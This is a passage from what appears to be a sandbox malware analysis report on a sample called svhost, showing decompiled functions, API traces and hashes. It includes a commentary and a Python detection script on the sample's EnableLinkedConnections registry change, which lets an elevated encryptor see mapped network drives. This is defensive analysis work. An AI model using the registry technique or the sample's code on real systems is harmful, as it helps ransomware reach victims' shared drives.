                                      • String ID: EnableLinkedConnections$EnableLinkedConnections$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                      • API String ID: 4171954881-224122817
                                      • Opcode ID: 7254b83442d9f14a8703cd99f14797b1970f4d658f42ce688bdf5c1facf954e7
                                      • Instruction ID: 7819f7495871e33c842dcff37f352e9a2f2e20d195c4431cd9a9103bbdb88b33
                                      • Opcode Fuzzy Hash: 7254b83442d9f14a8703cd99f14797b1970f4d658f42ce688bdf5c1facf954e7
                                      • Instruction Fuzzy Hash: 84115BB1A80308EFDB18DBA0DC5AFBDB774EB58701F105868BB157A2C1DA705609DB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%
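The function above is the report's "Contains functionality to modify Windows User Account Control (UAC) settings" hit. Decoded, the constants read: 0x80000002 is HKEY_LOCAL_MACHINE, 0xF003F is KEY_ALL_ACCESS, and the 4 passed to RegSetValueExW is REG_DWORD. When its argument is non-zero the function writes EnableLinkedConnections = 1 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, which makes drive letters mapped under the user's standard token visible to the elevated token as well; when the argument is zero it deletes the value again. For an encryptor that runs elevated and then walks network shares, that is the difference between seeing and not seeing the victim's mapped drives, and outside of deliberate administrator configuration a process writing this value is a useful detection signal. The Python below is an added example and not part of the Joe Sandbox report or the sample: it parses the report's own "APIs" lines for this function (copied into the script as sample input), decodes the hive, access mask and value type, attributes each value operation to the most recently opened key (the trace prints handles as "?", so this is an assumption that holds for straight-line code like this), and flags the enable/restore pair.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Win32 registry constants seen in the decompiled function and its API trace
# (names follow the Windows SDK, values are the ones printed in the report).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}
KEY_ALL_ACCESS = 0x000F003F
UAC_POLICY_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
LINKED_CONNECTIONS = "EnableLinkedConnections"

# The "APIs" lines of the function above, copied from this report as offline sample input.
SAMPLE_TRACE = r"""
RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,000F003F,?), ref: 00E5584D
RegSetValueExW.ADVAPI32(?,EnableLinkedConnections,00000000,00000004,00000001,00000004), ref: 00E55876
RegCloseKey.ADVAPI32(?), ref: 00E55880
RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,000F003F,?), ref: 00E5589D
RegDeleteValueW.ADVAPI32(?,EnableLinkedConnections), ref: 00E558B5
RegCloseKey.ADVAPI32(?), ref: 00E558BF
"""

LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")


@dataclass
class RegistryOp:
    api: str
    ref: str                      # code address the sandbox attributed the call to
    hive: Optional[str] = None
    subkey: Optional[str] = None
    access: Optional[int] = None  # samDesired of the RegOpenKeyExW that produced the handle
    value: Optional[str] = None
    reg_type: Optional[str] = None
    data: Optional[int] = None


def _arg(tok: str):
    """'?' is an unknown pointer/handle, an 8-digit hex field is a number, the rest is a string."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_trace(text: str) -> List[RegistryOp]:
    """Parse Joe Sandbox 'APIs' lines. Handles print as '?', so a value operation is
    attributed to the most recently opened key that is still open (assumption; it holds
    for straight-line code like the function above)."""
    ops: List[RegistryOp] = []
    open_keys: List[Tuple[Optional[str], Optional[str], Optional[int]]] = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip().lstrip("• "))  # the report prefixes lines with a bullet
        if not m:
            continue  # e.g. a "Part of subcall function" note
        api, ref = m["api"], m["ref"]
        args = [_arg(a) for a in m["args"].split(",")]
        if api == "RegOpenKeyExW":  # (hKey, lpSubKey, ulOptions, samDesired, phkResult)
            hive = HIVES.get(args[0], f"0x{args[0]:08X}") if isinstance(args[0], int) else None
            open_keys.append((hive, args[1], args[3]))
            ops.append(RegistryOp(api, ref, hive, args[1], args[3]))
        elif api in ("RegSetValueExW", "RegDeleteValueW"):
            hive, subkey, access = open_keys[-1] if open_keys else (None, None, None)
            op = RegistryOp(api, ref, hive, subkey, access, value=args[1])
            if api == "RegSetValueExW":  # (hKey, lpValueName, Reserved, dwType, lpData, cbData)
                op.reg_type = REG_TYPES.get(args[3], str(args[3]))
                op.data = args[4]  # the sandbox prints the DWORD behind lpData, not the pointer
            ops.append(op)
        elif api == "RegCloseKey":
            hive, subkey, access = open_keys.pop() if open_keys else (None, None, None)
            ops.append(RegistryOp(api, ref, hive, subkey, access))
    return ops


def linked_connections_findings(ops: List[RegistryOp]) -> List[Tuple[str, str]]:
    """(kind, ref) pairs: 'enable' for REG_DWORD 1 written to EnableLinkedConnections under
    HKLM Policies\\System (mapped drive letters become visible to the elevated token),
    'restore' when the value is deleted again."""
    findings = []
    for op in ops:
        if op.hive != "HKEY_LOCAL_MACHINE" or (op.subkey or "").lower() != UAC_POLICY_KEY.lower():
            continue
        if (op.value or "").lower() != LINKED_CONNECTIONS.lower():
            continue
        if op.api == "RegSetValueExW" and op.reg_type == "REG_DWORD" and op.data == 1:
            findings.append(("enable", op.ref))
        elif op.api == "RegDeleteValueW":
            findings.append(("restore", op.ref))
    return findings


if __name__ == "__main__":
    for kind, ref in linked_connections_findings(parse_trace(SAMPLE_TRACE)):
        print(f"{kind:8s} {LINKED_CONNECTIONS} at {ref}")
```

Run as a script it prints the enable at 00E55876 and the restore at 00E558B5, in the order the report lists them (the report sorts by address, so this is not an execution order; only one branch runs per call). The same parser can be pointed at the "APIs" block of any other function in this report, since the line format is identical.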

                                      C-Code - Quality: 77%
                                      			E00E60F30(void* __eflags, intOrPtr _a4) {
                                      				char _v8;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				void* __ecx;
                                      				void* __ebp;
                                      				signed int _t24;
                                      				intOrPtr _t38;
                                      				signed int _t55;
                                      
                                      				_push(0xffffffff);
                                      				_push(0xec03ca);
                                      				_push( *[fs:0x0]);
                                      				_push(_t38);
                                      				_t24 =  *0xeef074; // 0x221cac15
                                      				_push(_t24 ^ _t55);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v20 = _t38;
                                      				E00E724FC(_v20, 0);
                                      				_v8 = 0;
                                      				E00E56800(_v20 + 4);
                                      				_v8 = 1;
                                      				E00E56800(_v20 + 0xc);
                                      				_v8 = 2;
                                      				E00E56720(_v20 + 0x14);
                                      				_v8 = 3;
                                      				E00E56720(_v20 + 0x1c);
                                      				_v8 = 4;
                                      				E00E56800(_v20 + 0x24);
                                      				_v8 = 5;
                                      				E00E56800(_v20 + 0x2c);
                                      				_v8 = 6;
                                      				if(_a4 == 0) {
                                      					E00E72801("bad locale name");
                                      				}
                                      				E00E76752(_v20, _v20, _a4);
                                      				_v8 = 0xffffffff;
                                      				 *[fs:0x0] = _v16;
                                      				return _v20;
                                      			}











                                      0x00e60f33
                                      0x00e60f35
                                      0x00e60f40
                                      0x00e60f41
                                      0x00e60f42
                                      0x00e60f49
                                      0x00e60f4d
                                      0x00e60f53
                                      0x00e60f5b
                                      0x00e60f60
                                      0x00e60f6d
                                      0x00e60f72
                                      0x00e60f7c
                                      0x00e60f81
                                      0x00e60f8b
                                      0x00e60f90
                                      0x00e60f9a
                                      0x00e60f9f
                                      0x00e60fa9
                                      0x00e60fae
                                      0x00e60fb8
                                      0x00e60fbd
                                      0x00e60fc5
                                      0x00e60fcc
                                      0x00e60fcc
                                      0x00e60fd9
                                      0x00e60fe1
                                      0x00e60fee
                                      0x00e60ff9

                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E60F5B
                                      • _Yarn.LIBCPMTD ref: 00E60F6D
                                      • _Yarn.LIBCPMTD ref: 00E60F7C
                                      • _Yarn.LIBCPMTD ref: 00E60F8B
                                      • _Yarn.LIBCPMTD ref: 00E60F9A
                                      • _Yarn.LIBCPMTD ref: 00E60FA9
                                      • _Yarn.LIBCPMTD ref: 00E60FB8
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E60FD9
                                        • Part of subcall function 00E72801: std::bad_exception::bad_exception.LIBCMTD ref: 00E7280D
                                        • Part of subcall function 00E72801: __CxxThrowException@8.LIBVCRUNTIME ref: 00E7281B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                       • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Yarn$std::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                      • String ID: bad locale name
                                      • API String ID: 3305330502-1405518554
                                      • Opcode ID: 11372e79c5c51ec00986e83ec28ccdeceb730f34f49694cceaf53694d28f95d0
                                      • Instruction ID: bded882427d50012ddf4eda847b84cc1a995105239b1cc48661c73e64be52d04
                                      • Opcode Fuzzy Hash: 11372e79c5c51ec00986e83ec28ccdeceb730f34f49694cceaf53694d28f95d0
                                      • Instruction Fuzzy Hash: 0A216AB1D04289EBDF08DB98C851BAEBBB4FF04318F04595DE8227B382CB755A04C761
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 89%
                                      			E00E5EC10(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, char _a4, char _a8) {
                                      				intOrPtr _v0;
                                      				char _v8;
                                      				char _v16;
                                      				signed char _v17;
                                      				signed int _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				char _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				char _v88;
                                      				char _v104;
                                      				signed int _t64;
                                      				void* _t73;
                                      				signed char* _t76;
                                      				signed int _t104;
                                      				signed int _t126;
                                      				void* _t127;
                                      				void* _t134;
                                      
                                      				_t134 = __eflags;
                                      				_push(0xffffffff);
                                      				_push(0xec0c3a);
                                      				_push( *[fs:0x0]);
                                      				_t64 =  *0xeef074; // 0x221cac15
                                      				_push(_t64 ^ _t126);
                                      				_t1 =  &_v16; // 0xe5e520
                                      				 *[fs:0x0] = _t1;
                                      				_v28 = __ecx;
                                      				_v24 = 0;
                                      				E00E56E70(_v28);
                                      				_v8 = 0;
                                      				E00E524A0( &_a4);
                                      				_t130 = _t127 - 0x58 + 4 - 0xc;
                                      				_v68 = _t127 - 0x58 + 4 - 0xc;
                                      				_t8 =  &_a8; // 0xe5e520
                                      				_v72 = E00E53ED0( *_t8, _t130);
                                      				_v8 = 1;
                                      				_t12 =  &_a8; // 0xe5e520
                                      				_v36 = E00E53E90( *_t12,  &_v44);
                                      				_v40 = _v36;
                                      				_v8 = 2;
                                      				_t73 = E00E53120(_v40);
                                      				_v8 = 3;
                                      				E00E56D20(__ebx, _v28, __edi, __esi, _t134, _t73,  &_a4);
                                      				_v8 = 0;
                                      				E00E530E0();
                                      				_t22 =  &_a8; // 0xe5e520
                                      				_t76 = E00E53F20( *_t22);
                                      				_t135 =  *_t76 & 0x000000ff;
                                      				if(( *_t76 & 0x000000ff) == 0) {
                                      					_v56 = E00E536F0(__ebx, __edi, __esi, __eflags,  &_v88, _v0);
                                      					_v60 = _v56;
                                      					_v8 = 5;
                                      					_t104 = _v24 | 0x00000002;
                                      					__eflags = _t104;
                                      					_v24 = _t104;
                                      					_v32 = _v60;
                                      				} else {
                                      					_t23 =  &_a8; // 0xe5e520
                                      					_v48 = E00E53CC0( &_v104, E00E53F20( *_t23) + 4);
                                      					_v52 = _v48;
                                      					_v8 = 4;
                                      					_v24 = _v24 | 0x00000001;
                                      					_v32 = _v52;
                                      				}
                                      				_v64 = _v32;
                                      				E00E56CF0(_v28, _t135, _v64);
                                      				_v8 = 4;
                                      				if((_v24 & 0x00000002) != 0) {
                                      					_v24 = _v24 & 0xfffffffd;
                                      					E00E53750( &_v88);
                                      				}
                                      				_v8 = 0;
                                      				if((_v24 & 0x00000001) != 0) {
                                      					_v24 = _v24 & 0xfffffffe;
                                      					E00E53750( &_v104);
                                      				}
                                      				_push(_v17 & 0x000000ff);
                                      				E00E5F2B0(_v28,  &_a4);
                                      				_v8 = 0xffffffff;
                                      				_t62 =  &_v16; // 0xe5e520
                                      				 *[fs:0x0] =  *_t62;
                                      				return _v28;
                                      			}





























                                      0x00e5ec10
                                      0x00e5ec13
                                      0x00e5ec15
                                      0x00e5ec20
                                      0x00e5ec24
                                      0x00e5ec2b
                                      0x00e5ec2c
                                      0x00e5ec2f
                                      0x00e5ec35
                                      0x00e5ec38
                                      0x00e5ec42
                                      0x00e5ec47
                                      0x00e5ec52
                                      0x00e5ec5a
                                      0x00e5ec5f
                                      0x00e5ec63
                                      0x00e5ec6b
                                      0x00e5ec6e
                                      0x00e5ec76
                                      0x00e5ec7e
                                      0x00e5ec84
                                      0x00e5ec87
                                      0x00e5ec8e
                                      0x00e5ec97
                                      0x00e5ec9b
                                      0x00e5eca0
                                      0x00e5eca7
                                      0x00e5ecac
                                      0x00e5ecb0
                                      0x00e5ecbb
                                      0x00e5ecbd
                                      0x00e5ed05
                                      0x00e5ed0b
                                      0x00e5ed0e
                                      0x00e5ed18
                                      0x00e5ed18
                                      0x00e5ed1b
                                      0x00e5ed21
                                      0x00e5ecbf
                                      0x00e5ecbf
                                      0x00e5ecd7
                                      0x00e5ecdd
                                      0x00e5ece0
                                      0x00e5ecea
                                      0x00e5ecf0
                                      0x00e5ecf0
                                      0x00e5ed27
                                      0x00e5ed31
                                      0x00e5ed36
                                      0x00e5ed43
                                      0x00e5ed45
                                      0x00e5ed4c
                                      0x00e5ed4c
                                      0x00e5ed51
                                      0x00e5ed5e
                                      0x00e5ed60
                                      0x00e5ed67
                                      0x00e5ed67
                                      0x00e5ed70
                                      0x00e5ed78
                                      0x00e5ed7d
                                      0x00e5ed87
                                      0x00e5ed8a
                                      0x00e5ed95

                                      APIs
                                      • Concurrency::task_options::get_scheduler.LIBCPMTD ref: 00E5EC66
                                        • Part of subcall function 00E53ED0: Concurrency::scheduler_ptr::scheduler_ptr.LIBCPMTD ref: 00E53EE7
                                      • Concurrency::task_options::get_cancellation_token.LIBCPMTD ref: 00E5EC79
                                        • Part of subcall function 00E53E90: Concurrency::cancellation_token_source::cancellation_token_source.LIBCPMTD ref: 00E53EAA
                                      • Concurrency::cancellation_token::_GetImplValue.LIBCPMTD ref: 00E5EC8E
                                        • Part of subcall function 00E56D20: Concurrency::scheduler_ptr::scheduler_ptr.LIBCPMTD ref: 00E56D5B
                                        • Part of subcall function 00E56D20: _Task_ptr.LIBCPMTD ref: 00E56D68
                                        • Part of subcall function 00E56D20: shared_ptr.LIBCMTD ref: 00E56D80
                                        • Part of subcall function 00E56D20: std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E56D88
                                        • Part of subcall function 00E56D20: shared_ptr.LIBCPMTD ref: 00E56DA3
                                      • std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E5ECA7
                                        • Part of subcall function 00E530E0: Concurrency::cancellation_token::_Clear.LIBCPMTD ref: 00E53109
                                      • Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack.LIBCPMTD ref: 00E5ECD2
                                      • task.LIBCPMTD ref: 00E5ED31
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                       • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::cancellation_token::_Concurrency::scheduler_ptr::scheduler_ptrContainer_base12Container_base12::~_CreationTaskshared_ptrstd::_$CallstackCallstack::_ClearConcurrency::cancellation_token_source::cancellation_token_sourceConcurrency::details::_Concurrency::task_options::get_cancellation_tokenConcurrency::task_options::get_schedulerImplTask_ptrValuetask
                                      • String ID: $
                                      • API String ID: 894463372-1111102306
                                      • Opcode ID: 153b4f34b7fa2d7abf5da02c3bca8534093e844323ee03702c75e88464bee5d1
                                      • Instruction ID: 7067c3853599e4fb2285afa7690cc4f406ae894dc30159cccd0b9c9b099c315c
                                      • Opcode Fuzzy Hash: 153b4f34b7fa2d7abf5da02c3bca8534093e844323ee03702c75e88464bee5d1
                                      • Instruction Fuzzy Hash: E9512DB5D01248EFCB04DFA8D952AEEBBF5AF48311F108519E915B7381DB345B08CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 79%
                                      			E00E55180(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                      				char _v8;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				void* __ecx;
                                      				void* __ebp;
                                      				signed int _t25;
                                      				void* _t39;
                                      				intOrPtr _t40;
                                      				void* _t58;
                                      				signed int _t59;
                                      
                                      				_t58 = __edi;
                                      				_t39 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec03ca);
                                      				_push( *[fs:0x0]);
                                      				_push(_t40);
                                      				_t25 =  *0xeef074; // 0x221cac15
                                      				_push(_t25 ^ _t59);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v20 = _t40;
                                      				E00E724FC(_v20, 0);
                                      				_v8 = 0;
                                      				E00E56800(_v20 + 4);
                                      				_v8 = 1;
                                      				E00E56800(_v20 + 0xc);
                                      				_v8 = 2;
                                      				E00E56720(_v20 + 0x14);
                                      				_v8 = 3;
                                      				E00E56720(_v20 + 0x1c);
                                      				_v8 = 4;
                                      				E00E56800(_v20 + 0x24);
                                      				_v8 = 5;
                                      				E00E56800(_v20 + 0x2c);
                                      				_v8 = 6;
                                      				if(_a8 == 0) {
                                      					E00E72801("bad locale name");
                                      				}
                                      				E00E74D1F(_t39, _a4, _t58, _v20, _a4, _a8);
                                      				_v8 = 0xffffffff;
                                      				 *[fs:0x0] = _v16;
                                      				return _v20;
                                      			}













                                      0x00e55180
                                      0x00e55180
                                      0x00e55183
                                      0x00e55185
                                      0x00e55190
                                      0x00e55191
                                      0x00e55192
                                      0x00e55199
                                      0x00e5519d
                                      0x00e551a3
                                      0x00e551ab
                                      0x00e551b0
                                      0x00e551bd
                                      0x00e551c2
                                      0x00e551cc
                                      0x00e551d1
                                      0x00e551db
                                      0x00e551e0
                                      0x00e551ea
                                      0x00e551ef
                                      0x00e551f9
                                      0x00e551fe
                                      0x00e55208
                                      0x00e5520d
                                      0x00e55215
                                      0x00e5521c
                                      0x00e5521c
                                      0x00e5522d
                                      0x00e55235
                                      0x00e55242
                                      0x00e5524d

                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E551AB
                                      • _Yarn.LIBCPMTD ref: 00E551BD
                                      • _Yarn.LIBCPMTD ref: 00E551CC
                                      • _Yarn.LIBCPMTD ref: 00E551DB
                                      • _Yarn.LIBCPMTD ref: 00E551EA
                                      • _Yarn.LIBCPMTD ref: 00E551F9
                                      • _Yarn.LIBCPMTD ref: 00E55208
                                        • Part of subcall function 00E72801: std::bad_exception::bad_exception.LIBCMTD ref: 00E7280D
                                        • Part of subcall function 00E72801: __CxxThrowException@8.LIBVCRUNTIME ref: 00E7281B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                       • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Yarn$Exception@8LockitLockit::_Throwstd::_std::bad_exception::bad_exception
                                      • String ID: bad locale name
                                      • API String ID: 438106372-1405518554
                                      • Opcode ID: 796647690f47032d13b93deeb8b78e9ed28bc51c1e54427bb90d177f1c69e8a1
                                      • Instruction ID: 72d3605adb15c48f1db003436c921f700d5766baa51f9e309512036466cf5437
                                      • Opcode Fuzzy Hash: 796647690f47032d13b93deeb8b78e9ed28bc51c1e54427bb90d177f1c69e8a1
                                      • Instruction Fuzzy Hash: A7218EB1D04148EBDF08DB98C851BAEBBB4FF44318F04995CE9227B382CB755A04CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 47%
                                      			E00E8AC80(void* __ebx, char* __edx, char* _a4) {
                                      				int _v8;
                                      				signed int _v12;
                                      				char _v20;
                                      				short* _v28;
                                      				signed int _v32;
                                      				int _v36;
                                      				short* _v40;
                                      				int _v44;
                                      				intOrPtr _v56;
                                      				void* _v60;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t30;
                                      				signed int _t31;
                                      				char _t33;
                                      				int _t34;
                                      				signed short _t36;
                                      				signed short _t38;
                                      				void* _t49;
                                      				short* _t50;
                                      				int _t51;
                                      				int _t53;
                                      				char* _t59;
                                      				int _t60;
                                      				void* _t61;
                                      				char* _t62;
                                      				intOrPtr* _t63;
                                      				intOrPtr* _t64;
                                      				char* _t70;
                                      				intOrPtr _t71;
                                      				int _t72;
                                      				intOrPtr* _t73;
                                      				void* _t75;
                                      				short* _t76;
                                      				void* _t79;
                                      				signed int _t80;
                                      				void* _t82;
                                      				short* _t83;
                                      
                                      				_t70 = __edx;
                                      				_push(0xfffffffe);
                                      				_push(0xeec1f0);
                                      				_push( &M00EA0B20);
                                      				_push( *[fs:0x0]);
                                      				_t83 = _t82 - 0x18;
                                      				_t30 =  *0xeef074; // 0x221cac15
                                      				_v12 = _v12 ^ _t30;
                                      				_t31 = _t30 ^ _t80;
                                      				_v32 = _t31;
                                      				_push(__ebx);
                                      				_push(_t76);
                                      				_push(_t72);
                                      				_push(_t31);
                                      				 *[fs:0x0] =  &_v20;
                                      				_v28 = _t83;
                                      				_t59 = _a4;
                                      				if(_t59 != 0) {
                                      					_t62 = _t59;
                                      					_t10 =  &(_t62[1]); // 0xed268c
                                      					_t70 = _t10;
                                      					do {
                                      						_t33 =  *_t62;
                                      						_t62 =  &(_t62[1]);
                                      					} while (_t33 != 0);
                                      					_t63 = _t62 - _t70;
                                      					_t11 = _t63 + 1; // 0xed268d
                                      					_t34 = _t11;
                                      					_v36 = _t34;
                                      					if(_t34 > 0x7fffffff) {
                                      						L17:
                                      						E00E8AC60(0x80070057);
                                      						goto L18;
                                      					} else {
                                      						asm("lfence");
                                      						_t72 = MultiByteToWideChar(0, 0, _t59, _t34, 0, 0);
                                      						_v44 = _t72;
                                      						if(_t72 == 0) {
                                      							L18:
                                      							_t36 = GetLastError();
                                      							if(_t36 > 0) {
                                      								_t36 = _t36 & 0x0000ffff | 0x80070000;
                                      							}
                                      							E00E8AC60(_t36);
                                      							goto L21;
                                      						} else {
                                      							_v8 = 0;
                                      							_t49 = _t72 + _t72;
                                      							if(_t72 >= 0x1000) {
                                      								asm("lfence");
                                      								_push(_t49);
                                      								_t50 = E00EA49B4();
                                      								_t83 =  &(_t83[2]);
                                      								_t76 = _t50;
                                      								_v40 = _t76;
                                      								_v8 = 0xfffffffe;
                                      							} else {
                                      								E00E8A400();
                                      								_v28 = _t83;
                                      								_t76 = _t83;
                                      								_v40 = _t76;
                                      								_v8 = 0xfffffffe;
                                      							}
                                      							_t51 = _v36;
                                      							if(_t76 == 0) {
                                      								L16:
                                      								E00E8AC60(0x8007000e);
                                      								goto L17;
                                      							} else {
                                      								asm("lfence");
                                      								_t53 = MultiByteToWideChar(0, 0, _t59, _t51, _t76, _t72);
                                      								if(_t53 == 0) {
                                      									L21:
                                      									if(_t72 >= 0x1000) {
                                      										asm("lfence");
                                      										E00EA478C(_t76);
                                      										_t83 =  &(_t83[2]);
                                      									}
                                      									_t38 = GetLastError();
                                      									if(_t38 > 0) {
                                      										_t38 = _t38 & 0x0000ffff | 0x80070000;
                                      									}
                                      									E00E8AC60(_t38);
                                      									asm("int3");
                                      									asm("int3");
                                      									_push(_t80);
                                      									_t71 = _v56;
                                      									_push(_t72);
                                      									_t73 = _t63;
                                      									 *_t73 = 0xec8288;
                                      									 *((intOrPtr*)(_t73 + 4)) =  *((intOrPtr*)(_t71 + 4));
                                      									_t64 =  *((intOrPtr*)(_t71 + 8));
                                      									 *((intOrPtr*)(_t73 + 8)) = _t64;
                                      									 *(_t73 + 0xc) = 0;
                                      									if(_t64 != 0) {
                                      										 *0xec4320(_t64, _t76);
                                      										 *((intOrPtr*)( *((intOrPtr*)( *_t64 + 4))))();
                                      									}
                                      									return _t73;
                                      								} else {
                                      									asm("lfence");
                                      									__imp__#2(_t76);
                                      									_t60 = _t53;
                                      									if(_t72 >= 0x1000) {
                                      										asm("lfence");
                                      										E00EA478C(_t76);
                                      										_t83 =  &(_t83[2]);
                                      									}
                                      									if(_t60 == 0) {
                                      										goto L16;
                                      									} else {
                                      										asm("lfence");
                                      										goto L2;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				} else {
                                      					L2:
                                      					 *[fs:0x0] = _v20;
                                      					_pop(_t75);
                                      					_pop(_t79);
                                      					_pop(_t61);
                                      					return E00E89A35(_t61, _v32 ^ _t80, _t70, _t75, _t79);
                                      				}
                                      			}

                                      0x00e8ac80
                                      0x00e8ac83
                                      0x00e8ac85
                                      0x00e8ac8a
                                      0x00e8ac95
                                      0x00e8ac96
                                      0x00e8ac99
                                      0x00e8ac9e
                                      0x00e8aca1
                                      0x00e8aca3
                                      0x00e8aca6
                                      0x00e8aca7
                                      0x00e8aca8
                                      0x00e8aca9
                                      0x00e8acad
                                      0x00e8acb3
                                      0x00e8acb6
                                      0x00e8acbb
                                      0x00e8ace0
                                      0x00e8ace2
                                      0x00e8ace2
                                      0x00e8ace5
                                      0x00e8ace5
                                      0x00e8ace7
                                      0x00e8ace8
                                      0x00e8acec
                                      0x00e8acee
                                      0x00e8acee
                                      0x00e8acf1
                                      0x00e8acf9
                                      0x00e8add0
                                      0x00e8add5
                                      0x00000000
                                      0x00e8acff
                                      0x00e8acff
                                      0x00e8ad12
                                      0x00e8ad14
                                      0x00e8ad19
                                      0x00e8adda
                                      0x00e8adda
                                      0x00e8ade2
                                      0x00e8ade7
                                      0x00e8ade7
                                      0x00e8aded
                                      0x00000000
                                      0x00e8ad1f
                                      0x00e8ad1f
                                      0x00e8ad26
                                      0x00e8ad2f
                                      0x00e8ad47
                                      0x00e8ad4a
                                      0x00e8ad4b
                                      0x00e8ad50
                                      0x00e8ad53
                                      0x00e8ad55
                                      0x00e8ad58
                                      0x00e8ad31
                                      0x00e8ad31
                                      0x00e8ad36
                                      0x00e8ad39
                                      0x00e8ad3b
                                      0x00e8ad3e
                                      0x00e8ad3e
                                      0x00e8ad7c
                                      0x00e8ad81
                                      0x00e8adc6
                                      0x00e8adcb
                                      0x00000000
                                      0x00e8ad83
                                      0x00e8ad83
                                      0x00e8ad8e
                                      0x00e8ad96
                                      0x00e8adf2
                                      0x00e8adf8
                                      0x00e8adfa
                                      0x00e8adfe
                                      0x00e8ae03
                                      0x00e8ae03
                                      0x00e8ae06
                                      0x00e8ae0e
